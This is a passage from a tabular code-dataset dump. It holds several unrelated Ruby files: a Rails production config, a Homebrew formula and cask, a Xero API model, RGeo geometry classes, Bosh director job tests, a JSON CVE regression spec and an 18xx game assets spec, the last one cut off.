hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
ed6ad94ede28ac5b48876fc224aa648636def829 | 3,791 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Attempt to read encrypted secrets from `config/secrets.yml.enc`.
# Requires an encryption key in `ENV["RAILS_MASTER_KEY"]` or
# `config/secrets.yml.key`.
config.read_encrypted_secrets = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "leo_tweet_clone_#{Rails.env}"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 41.206522 | 102 | 0.757848 |
39d26698667203f4ce1809ac551cf6b74d2c5e1f | 947 | # frozen_string_literal: true
module Git
module Cop
module Styles
class CommitBodyLineLength < Abstract
def self.defaults
{
enabled: true,
severity: :error,
length: 72
}
end
def valid?
commit.body_lines.all? { |line| valid_line? line }
end
def issue
return {} if valid?
{
hint: "Use #{length} characters or less per line.",
lines: affected_lines
}
end
private
def length
settings.fetch :length
end
def valid_line? line
line.length <= length
end
def affected_lines
commit.body_lines.each.with_object([]).with_index do |(line, lines), index|
lines << self.class.build_issue_line(index, line) unless valid_line?(line)
end
end
end
end
end
end
| 20.148936 | 86 | 0.517423 |
7a3a7ecf4b264e80ef6f7fcb0aac3379e7b375f6 | 137 | module Types
class EmailType < Types::BaseObject
field :email, String, null: true
field :purpose, String, null: true
end
end
| 19.571429 | 38 | 0.70073 |
b97323af0881d066abc0348ac21ec98936ec091f | 1,154 | require_relative '../spec_helper'
require 'json'
module JSONSpecs
class MyClass
def initialize(foo)
@foo = foo
end
def self.json_create(hash)
new(*hash['args'])
end
def to_json(*args)
{ 'json_class' => self.class.name, 'args' => [ @foo ] }.to_json(*args)
end
end
end
guard -> {
ruby_version_is "2.5.8"..."2.6.0" or
ruby_version_is "2.6.6" or
JSON.const_defined?(:Pure) or
version_is(JSON::VERSION, '2.3.0')
} do
platform_is_not :darwin do
describe "CVE-2020-10663 is resisted by" do
it "only creating custom objects if passed create_additions: true or using JSON.load" do
obj = JSONSpecs::MyClass.new("bar")
JSONSpecs::MyClass.should.json_creatable?
json = JSON.dump(obj)
JSON.parse(json, create_additions: true).class.should == JSONSpecs::MyClass
JSON(json, create_additions: true).class.should == JSONSpecs::MyClass
JSON.load(json).class.should == JSONSpecs::MyClass
JSON.parse(json).class.should == Hash
JSON.parse(json, nil).class.should == Hash
JSON(json).class.should == Hash
end
end
end
end
| 26.227273 | 94 | 0.641248 |
034346beb5581c60192126aed2900473502e64e3 | 201 | File.open("../DigitalSynthVRA8N/constants.h", "r") do |input|
File.open("./constants.rb", "w") do |output|
input.each_line do |line|
output.puts line.chomp[16..-2]
end
end
end
| 25.125 | 62 | 0.606965 |
b9d58dc78a2c8ce2d4c0cfa76270381479d4ec52 | 1,211 | class Terragrunt < Formula
desc "Thin wrapper for Terraform e.g. for locking state."
homepage "https://github.com/gruntwork-io/terragrunt"
url "https://github.com/gruntwork-io/terragrunt/archive/v0.11.1.tar.gz"
sha256 "997276ea4c42d541b570f72a3e69bf2e889382b54f9c1cf38b337ec9ec0553f5"
head "https://github.com/gruntwork-io/terragrunt.git"
bottle do
cellar :any_skip_relocation
sha256 "486ecb40c9cf8d33992a5ed33e32dedbadec9f3b9329465a9422c2a1687459e4" => :sierra
sha256 "3d21b2ae76fd560dc6a3eea4b5002a971c0e496cc64c449ebfe05299e4f7f9ee" => :el_capitan
sha256 "3e88553f3ea6b07162bd3b16bf17409d048f974e2615fc72f5ea9c1243b49ea0" => :yosemite
end
depends_on "glide" => :build
depends_on "go" => :build
depends_on "terraform"
def install
ENV["GOPATH"] = buildpath
ENV["GLIDE_HOME"] = HOMEBREW_CACHE/"glide_home/#{name}"
mkdir_p buildpath/"src/github.com/gruntwork-io/"
ln_s buildpath, buildpath/"src/github.com/gruntwork-io/terragrunt"
system "glide", "install"
system "go", "build", "-o", bin/"terragrunt", "-ldflags", "-X main.VERSION=v#{version}"
end
test do
assert_match version.to_s, shell_output("#{bin}/terragrunt --version")
end
end
| 37.84375 | 92 | 0.748968 |
ed272d4776a3a585cb65cd15bf570c163db18417 | 1,059 | module TomatoShrieker
class EntryTest < TestCase
def setup
@entries = Entry.dataset.all.select(&:feed)
end
test '1レコード以上のエントリが存在するか' do
assert_predicate(@entries, :present?)
end
def test_feed
assert_kind_of(FeedSource, @entries.sample.feed) if @entries.present?
end
def test_create_template
return unless entry = @entries.find(&:create_template)
assert_kind_of(Template, entry.create_template)
assert_kind_of(Template, entry.create_template(:default))
end
def test_uri
return unless entry = @entries.find(&:uri)
assert_kind_of(Ginseng::URI, entry.uri)
end
def test_enclosures
return unless entry = @entries.find(&:enclosures)
assert_kind_of(Array, entry.enclosures)
entry.enclosures.each do |uri|
assert_kind_of(Ginseng::URI, uri)
end
end
def test_tags
return unless entry = @entries.find {|v| v.tags.count.positive?}
entry.tags.each do |tag|
assert_kind_of(String, tag)
end
end
end
end
| 25.214286 | 75 | 0.670444 |
26786e961e8b770163c344d264ef40adfee4f6f9 | 7,635 | =begin
#Xero Files API
#These endpoints are specific to Xero Files API
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.3.1
=end
require 'time'
require 'date'
module XeroRuby::Files
require 'bigdecimal'
class Folder
# The name of the folder
attr_accessor :name
# The number of files in the folder
attr_accessor :file_count
# The email address used to email files to the inbox. Only the inbox will have this element.
attr_accessor :email
# to indicate if the folder is the Inbox. The Inbox cannot be renamed or deleted.
attr_accessor :is_inbox
# Xero unique identifier for a folder Files
attr_accessor :id
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'name' => :'Name',
:'file_count' => :'FileCount',
:'email' => :'Email',
:'is_inbox' => :'IsInbox',
:'id' => :'Id'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'name' => :'String',
:'file_count' => :'Integer',
:'email' => :'String',
:'is_inbox' => :'Boolean',
:'id' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `XeroRuby::Files::Folder` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `XeroRuby::Files::Folder`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'name')
self.name = attributes[:'name']
end
if attributes.key?(:'file_count')
self.file_count = attributes[:'file_count']
end
if attributes.key?(:'email')
self.email = attributes[:'email']
end
if attributes.key?(:'is_inbox')
self.is_inbox = attributes[:'is_inbox']
end
if attributes.key?(:'id')
self.id = attributes[:'id']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
name == o.name &&
file_count == o.file_count &&
email == o.email &&
is_inbox == o.is_inbox &&
id == o.id
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[name, file_count, email, is_inbox, id].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(parse_date(value))
when :Date
Date.parse(parse_date(value))
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BigDecimal
BigDecimal(value.to_s)
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
XeroRuby::Files.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash(downcase: false)
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
key = downcase ? attr : param
hash[key] = _to_hash(value)
end
hash
end
# Returns the object in the form of hash with snake_case
def to_attributes
to_hash(downcase: true)
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
def parse_date(datestring)
if datestring.include?('Date')
seconds_since_epoch = datestring.scan(/[0-9]+/)[0].to_i / 1000.0
Time.at(seconds_since_epoch).utc.strftime('%Y-%m-%dT%H:%M:%S%z').to_s
else # handle date 'types' for small subset of payroll API's
Time.parse(datestring).strftime('%Y-%m-%dT%H:%M:%S').to_s
end
end
end
end
| 29.708171 | 201 | 0.61074 |
01bfae44a985b7474e03e9a1bf624b2fbfec5bcb | 3,942 | # -----------------------------------------------------------------------------
#
# Projtected geographic feature classes
#
# -----------------------------------------------------------------------------
module RGeo
module Geographic
class ProjectedPointImpl # :nodoc:
include Feature::Point
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicPointMethods
include ProjectedGeometryMethods
include ProjectedPointMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::Point).include_in_class(self, true)
end
class ProjectedLineStringImpl # :nodoc:
include Feature::LineString
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicLineStringMethods
include ProjectedGeometryMethods
include ProjectedNCurveMethods
include ProjectedLineStringMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::LineString).include_in_class(self, true)
end
class ProjectedLinearRingImpl # :nodoc:
include Feature::LinearRing
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicLineStringMethods
include ImplHelper::BasicLinearRingMethods
include ProjectedGeometryMethods
include ProjectedNCurveMethods
include ProjectedLineStringMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::LinearRing).include_in_class(self, true)
end
class ProjectedLineImpl # :nodoc:
include Feature::Line
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicLineStringMethods
include ImplHelper::BasicLineMethods
include ProjectedGeometryMethods
include ProjectedNCurveMethods
include ProjectedLineStringMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::Line).include_in_class(self, true)
end
class ProjectedPolygonImpl # :nodoc:
include Feature::Polygon
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicPolygonMethods
include ProjectedGeometryMethods
include ProjectedNSurfaceMethods
include ProjectedPolygonMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::Polygon).include_in_class(self, true)
end
class ProjectedGeometryCollectionImpl # :nodoc:
include Feature::GeometryCollection
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicGeometryCollectionMethods
include ProjectedGeometryMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::GeometryCollection).include_in_class(self, true)
end
class ProjectedMultiPointImpl # :nodoc:
include Feature::MultiPoint
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicGeometryCollectionMethods
include ImplHelper::BasicMultiPointMethods
include ProjectedGeometryMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::MultiPoint).include_in_class(self, true)
end
class ProjectedMultiLineStringImpl # :nodoc:
include Feature::MultiLineString
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicGeometryCollectionMethods
include ImplHelper::BasicMultiLineStringMethods
include ProjectedGeometryMethods
include ProjectedNCurveMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::MultiLineString).include_in_class(self, true)
end
class ProjectedMultiPolygonImpl # :nodoc:
include Feature::MultiPolygon
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicGeometryCollectionMethods
include ImplHelper::BasicMultiPolygonMethods
include ProjectedGeometryMethods
include ProjectedNSurfaceMethods
include ProjectedMultiPolygonMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::MultiPolygon).include_in_class(self, true)
end
end
end
| 23.60479 | 105 | 0.724252 |
f7fd1aa7039bb9b352f9cf2ec11c320c932ececf | 316 | module UsersHelper
# Returns the Gravatar for the given user.
def gravatar_for(user, size: 80)
gravatar_id = Digest::MD5::hexdigest(user.email.downcase)
gravatar_url = "https://secure.gravatar.com/avatar/#{gravatar_id}?=#{size}"
image_tag(gravatar_url, alt: user.name, class: "gravatar")
end
end
| 35.111111 | 79 | 0.718354 |
39524c9ffadeb206cd9252b0ab77df1b9231bd1c | 1,240 | #
# Copyright 2015, SUSE Linux GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../../../../spec_helper"
describe "Crowbar::Client::Request::Node::Role" do
it_behaves_like "a request class", true do
subject do
::Crowbar::Client::Request::Node::Role.new(
attrs
)
end
let!(:attrs) do
{
name: "node1",
value: "controller"
}
end
let!(:params) do
{
role: "controller"
}
end
let!(:method) do
:post
end
let!(:url) do
"crowbar/machines/1.0/role/node1"
end
let!(:headers) do
{
"Content-Type" => "application/json",
"Accept" => "application/json"
}
end
end
end
| 22.142857 | 74 | 0.626613 |
ff5c32da6c53861141995942bd62b5cfaa6d09e0 | 729 | cask 'deco' do
version '0.7.1'
sha256 'cd9d9b553d9fcb706bacba94cbbf7ec80a77609f5505d485b2ebad7c16a8ffba'
# github.com/decosoftware/deco-ide/ was verified as official when first introduced to the cask
url "https://github.com/decosoftware/deco-ide/releases/download/v#{version}/Deco-#{version}.pkg"
appcast 'https://github.com/decosoftware/deco-ide/releases.atom'
name 'Deco'
homepage 'https://www.decosoftware.com/'
# pkg cannot be installed automatically and the .zip of the `app` has errors
installer manual: "Deco-#{version}.pkg"
uninstall pkgutil: 'com.decosoftware.Deco'
zap trash: [
'~/.Deco',
'~/Library/Application Support/com.decosoftware.Deco',
]
end
| 34.714286 | 98 | 0.705075 |
e271fa8aee1b37843edf119304ce5414f1010dde | 12,178 | require 'spec_helper'
require 'support/release_helper'
module Bosh::Director
describe ReleaseJob do
describe 'update' do
subject(:release_job) { described_class.new(job_meta, release_model, release_dir, double(:logger).as_null_object) }
let(:release_dir) { Dir.mktmpdir }
after { FileUtils.rm_rf(release_dir) }
let(:release_model) { Models::Release.make }
let(:job_meta) { {'name' => 'foo', 'version' => '1', 'sha1' => 'deadbeef', 'fingerprint' => 'bar'} }
before { allow(App).to receive_message_chain(:instance, :blobstores, :blobstore).and_return(blobstore) }
let(:blobstore) { instance_double('Bosh::Blobstore::BaseClient') }
let(:job_tarball_path) { File.join(release_dir, 'jobs', 'foo.tgz') }
let(:job_bits) { create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}}) }
before { FileUtils.mkdir_p(File.dirname(job_tarball_path)) }
before { allow(blobstore).to receive(:create).and_return('fake-blobstore-id') }
context 'when a template already exists' do
before do
Models::Template.make(
blobstore_id: 'original-blobstore-id',
name: 'foo',
version: '1',
sha1: 'deadbeef',
fingerprint: 'bar',
release_id: release_model.id,
)
end
it 'attempts to delete the existing blob from the blobstore' do
File.open(job_tarball_path, 'w') { |f| f.write(job_bits) }
expect(blobstore).to receive(:delete).with('original-blobstore-id')
expect(blobstore).to receive(:create).and_return('fake-blobstore-id')
saved_template = release_job.update
expect(saved_template.name).to eq('foo')
expect(saved_template.version).to eq('1')
expect(saved_template.release).to eq(release_model)
expect(saved_template.sha1).to eq('deadbeef')
expect(saved_template.blobstore_id).to eq('fake-blobstore-id')
end
it 'does not bail if blobstore deletion fails' do
File.open(job_tarball_path, 'w') { |f| f.write(job_bits) }
expect(blobstore).to receive(:delete).and_raise Bosh::Blobstore::BlobstoreError
expect(blobstore).to receive(:create)
saved_template = release_job.update
expect(saved_template.blobstore_id).to eq('fake-blobstore-id')
end
end
describe 'without existing blobstore_id' do
it 'it associates a new blob with the template' do
File.open(job_tarball_path, 'w') { |f| f.write(job_bits) }
expect(blobstore).to_not receive(:delete)
expect(blobstore).to receive(:create)
saved_template = release_job.update
expect(saved_template.blobstore_id).to eq('fake-blobstore-id')
end
end
it 'should upload job bits to blobstore' do
File.open(job_tarball_path, 'w') { |f| f.write(job_bits) }
expect(blobstore).to receive(:create) do |f|
f.rewind
expect(::Digest::SHA1.hexdigest(f.read)).to eq(::Digest::SHA1.hexdigest(job_bits))
::Digest::SHA1.hexdigest(f.read)
end
expect(Models::Template.count).to eq(0)
release_job.update
template = Models::Template.first
expect(template.name).to eq('foo')
expect(template.version).to eq('1')
expect(template.release).to eq(release_model)
expect(template.sha1).to eq('deadbeef')
end
it 'should fail when it cannot extract job archive' do
result = Bosh::Exec::Result.new('cmd', 'output', 1)
expect(Bosh::Exec).to receive(:sh).and_return(result)
expect { release_job.update }.to raise_error(JobInvalidArchive)
end
it 'whines on missing manifest' do
job_without_manifest =
create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}}, skip_manifest: true)
File.open(job_tarball_path, 'w') { |f| f.write(job_without_manifest) }
expect { release_job.update }.to raise_error(JobMissingManifest)
end
it 'whines on missing monit file' do
job_without_monit =
create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}}, skip_monit: true)
File.open(job_tarball_path, 'w') { |f| f.write(job_without_monit) }
expect { release_job.update }.to raise_error(JobMissingMonit)
end
it 'does not whine when it has a foo.monit file' do
job_without_monit =
create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}}, monit_file: 'foo.monit')
File.open(job_tarball_path, 'w') { |f| f.write(job_without_monit) }
expect { release_job.update }.to_not raise_error
end
it 'saves the templates hash in the template spec' do
job_with_interesting_templates =
create_job('foo', 'monit', {
'template source path' => {'destination' => 'rendered template path', 'contents' => 'whatever'}
}, monit_file: 'foo.monit')
File.open(job_tarball_path, 'w') { |f| f.write(job_with_interesting_templates) }
saved_template = release_job.update
expect(saved_template.spec['templates']).to eq({'template source path' => 'rendered template path'})
end
it 'whines on missing template' do
job_without_template =
create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}}, skip_templates: ['foo'])
File.open(job_tarball_path, 'w') { |f| f.write(job_without_template) }
expect { release_job.update }.to raise_error(JobMissingTemplateFile)
end
it 'does not whine when no packages are specified' do
job_without_packages =
create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}},
manifest: { 'name' => 'foo', 'templates' => {} })
File.open(job_tarball_path, 'w') { |f| f.write(job_without_packages) }
job = nil
expect { job = release_job.update }.to_not raise_error
expect(job.package_names).to eq([])
end
it 'whines when packages is not an array' do
job_with_invalid_packages =
create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}},
manifest: { 'name' => 'foo', 'templates' => {}, 'packages' => 'my-awesome-package' })
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_packages) }
expect { release_job.update }.to raise_error(JobInvalidPackageSpec)
end
context 'when job spec file includes provides' do
it 'verifies it is an array' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'provides' => 'Invalid'})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(JobInvalidLinkSpec)
end
it 'verifies that it is an array of hashes' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'provides' => ['Invalid', 1]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(JobInvalidLinkSpec)
end
it 'verifies hash contains name and type' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'provides' => [{'name' => 'db'}]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(JobInvalidLinkSpec)
end
it 'verifies names are unique' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'provides' => [{'name' => 'db', 'type' => 'first'}, {'name' => 'db', 'type' => 'second'}]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(
JobDuplicateLinkName,
"Job 'foo' 'provides' specifies links with duplicate name 'db'"
)
end
it 'saves them on template' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'provides' => [{'name' => 'db1', 'type' =>'db'}, {'name' => 'db2', 'type' =>'db'}]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect(Models::Template.count).to eq(0)
release_job.update
template = Models::Template.first
expect(template.provides).to eq([{'name' => 'db1', 'type' =>'db'}, {'name' => 'db2', 'type' =>'db'}])
end
end
context 'when job spec file includes consumes' do
it 'verifies it is an array' do
allow(blobstore).to receive(:create).and_return('fake-blobstore-id')
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'consumes' => 'Invalid'})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(JobInvalidLinkSpec)
end
it 'verifies that it is an array of string' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'consumes' => ['Invalid', 1]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(JobInvalidLinkSpec)
end
it 'verifies hash contains name and type' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'consumes' => [{'name' => 'db'}]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(JobInvalidLinkSpec)
end
it 'verifies names are unique' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'consumes' => [{'name' => 'db', 'type' => 'one'}, {'name' => 'db', 'type' => 'two'}]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(
JobDuplicateLinkName,
"Job 'foo' 'consumes' specifies links with duplicate name 'db'"
)
end
it 'saves them on template' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'consumes' => [{'name' => 'db1', 'type' =>'db'}, {'name' => 'db2', 'type' =>'db'}]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect(Models::Template.count).to eq(0)
release_job.update
template = Models::Template.first
expect(template.consumes).to eq([{'name' => 'db1', 'type' =>'db'}, {'name' => 'db2', 'type' =>'db'} ])
end
end
end
def create_job(name, monit, configuration_files, options = { })
io = StringIO.new
manifest = {
'name' => name,
'templates' => {},
'packages' => []
}.merge(options.fetch(:manifest, {}))
configuration_files.each do |path, configuration_file|
manifest['templates'][path] = configuration_file['destination']
end
Archive::Tar::Minitar::Writer.open(io) do |tar|
manifest = options[:manifest] if options[:manifest]
unless options[:skip_manifest]
tar.add_file('job.MF', {:mode => '0644', :mtime => 0}) { |os, _| os.write(manifest.to_yaml) }
end
unless options[:skip_monit]
monit_file = options[:monit_file] ? options[:monit_file] : 'monit'
tar.add_file(monit_file, {:mode => '0644', :mtime => 0}) { |os, _| os.write(monit) }
end
tar.mkdir('templates', {:mode => '0755', :mtime => 0})
configuration_files.each do |path, configuration_file|
unless options[:skip_templates] && options[:skip_templates].include?(path)
tar.add_file("templates/#{path}", {:mode => '0644', :mtime => 0}) do |os, _|
os.write(configuration_file['contents'])
end
end
end
end
io.close
gzip(io.string)
end
end
end
| 40.729097 | 167 | 0.602151 |
b9db5267245018373dbda3b09848bb06f79ef8eb | 14,654 | # frozen_string_literal: true
require 'spec_helper'
require 'assets'
describe 'Assets' do
before(:all) { @subject = Assets.new }
subject { @subject }
def render(**needs)
subject.html('assets/app/app.rb', **needs)
end
describe '#html' do
it 'renders logged out' do
expect(render).to include('Welcome!')
end
it 'renders home logged in' do
expect(render(user: { name: 'toby', settings: { consent: true } })).to include('Welcome toby!')
end
it 'consent logged in' do
expect(render(user: { name: 'toby' })).to include('I agree to the privacy policy')
end
it 'renders about' do
expect(render(app_route: '/about')).to include('created and maintained')
end
it 'renders tiles' do
expect(render(app_route: '/tiles/all')).to include('Generic Map Hexes')
expect(render(app_route: '/tiles/57')).to include('57')
expect(render(app_route: '/tiles/18Chesapeake')).to include('I9')
expect(render(app_route: '/tiles/18Chesapeake/I9')).to include('I9')
expect(render(app_route: '/tiles/18Chesapeake/X1')).to include('X1')
x2_x3 = render(app_route: '/tiles/18Chesapeake/X2+X3')
expect(x2_x3).to include('X2')
expect(x2_x3).to include('X3')
aggregate_failures 'location name for all stop types' do
with_loc_names = render(app_route: '/tiles/18Chesapeake/B2+H6+K3')
%w[B2 Pittsburgh H6 Baltimore K3 Trenton Amboy D&R].each do |str|
expect(with_loc_names).to include(str)
end
end
multiple_games = render(app_route: '/tiles/1889+18Chesapeake')
expect(multiple_games).to include('Kouchi')
expect(multiple_games).to include('Delmarva')
%w[1889 18Chesapeake].each do |title|
expect(render(app_route: "/tiles/#{title}")).to include("#{title} Map Hexes")
expect(render(app_route: "/tiles/#{title}")).to include("#{title} Tile Manifest")
expect(render(app_route: "/tiles/#{title}")).not_to include('TODO')
end
end
it 'renders login' do
expect(render(app_route: '/login')).to include('Login')
end
it 'renders signup' do
expect(render(app_route: '/signup')).to include('Signup')
end
context '/map' do
{
# games with config but not full implementation; just do a quick spot check
'1817' => %w[Pittsburgh],
'1817NA' => %w[
Anchorage The Klondike Dawson City Hazelton Arctic Edmonton Winnipeg
Quebec Europe Seattle Denver Toronto New York Hawaii Los Angeles
Guadalajara Mexico City Miami New Orleans Belize South America
20 30 40 50 60 80 15 10 B Asia
],
'1846' => %w[Chicago],
# games with full implementation; verify every string on the map
'1889' => %w[
